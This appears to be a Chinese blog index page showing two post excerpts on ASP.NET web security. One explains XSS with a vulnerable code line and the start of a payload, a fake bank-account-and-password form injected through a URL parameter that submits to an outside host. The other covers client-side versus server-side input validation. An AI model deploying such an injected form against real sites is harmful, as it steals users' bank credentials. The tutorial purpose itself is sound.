摘要:
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。源页面放一个标签,在后台Page_Load里面写this.textLabel.Text = Request["Msg"];构建攻击,让攻击后把数据传递到目标页构建代码如下:Msg=form action='http://www.shtarena.com' method='get'银行账号:input type='text' name='ID'/密码:input ty 阅读全文
摘要:
比如设置取款额度不能大于100元,客户端写法如下:asp:Button ID="txtSubmit" runat="server"OnClientClick="var test=document.getElementById('TextBox1').value;if(parseInt(test,10)100) alert('取款额度不能大于100'); else return;" Text="Button" onclick="Button1_Click" / 但是如果客户端浏览器禁用JavaScript,就没有效果;服务端验证如下:if (int.Parse(this.TextBox1. 阅读全文